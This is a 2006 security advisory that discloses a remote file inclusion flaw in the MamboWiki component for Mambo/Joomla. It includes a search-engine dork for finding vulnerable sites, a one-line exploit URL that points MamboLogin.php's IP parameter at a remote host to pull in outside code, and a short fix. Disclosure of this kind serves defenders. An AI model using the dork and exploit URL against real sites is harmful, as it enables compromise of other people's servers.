=0D
    .:[ insecurity research team ]:.=0D
     .__..____.:.______.____.:.____ .=0D
 .:. |  |/    \:/  ___// __ \:/   _\.:.=0D
   : |  |   |  \\____\\  ___/\   /__ :. .=0D
 ..: |__|___|  /____  >\___  >\___  >.:=0D
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:=0D
 .   ...:.    .advisory.    .:...=0D
         :..................: 18.o8.2oo6 ..=0D
 =0D
 =0D
  Affected Application: MamboWiki <= v0.9.4=0D
=0D
          (Mambo/Joomla CMS Component)=0D
 =0D
 =0D
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Discoverd by: camino=0D
 =0D
  Team: Insecurity Research Team=0D
 =0D
URL: http://www.insecurityresearch.org=0D 
 =0D
  E-Mail: camino[at]sexmagnet[dot]com=0D
 =0D
 =0D
 =0D
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  Typ: Remote [x]  Local [ ]=0D
 =0D
       Remote File Inclusion [x]  SQL Injection [ ]=0D
 =0D
  Level: Low [ ]  Middle [ ]  High [x]=0D
 =0D
  Application: MamboWiki=0D
 =0D
  Version: <= 0.9.4=0D
 =0D
  Vulnerable File: MamboLogin.php=0D
 =0D
URL: http://www.lyquidity.com=0D 
 =0D
  Description: A component like Wikipedia for Jooma/Mambo.=0D
 =0D
  Dork: inurl:"com_mambowiki"=0D
 =0D
 =0D
 =0D
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
=0D
=0D
http://[sitepath]/[joomlapath]/components/com_mambowiki/=0D 
=0D
MamboLogin.php?IP=http://huh?=0D 
 =0D
 =0D
 =0D
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  o1.) open MamboLogin.php=0D
 =0D
  o2.) add this in line 8:=0D
=0D
         defined( '_VALID_MOS' ) or =0D
=0D
         die( 'Direct Access to this location is not allowed.' );=0D
=0D
  o3.) done!=0D
=0D
=0D
=0D
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .=0D
 =0D
 =0D
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members =0D
=0D
  of insecurity research team ;-)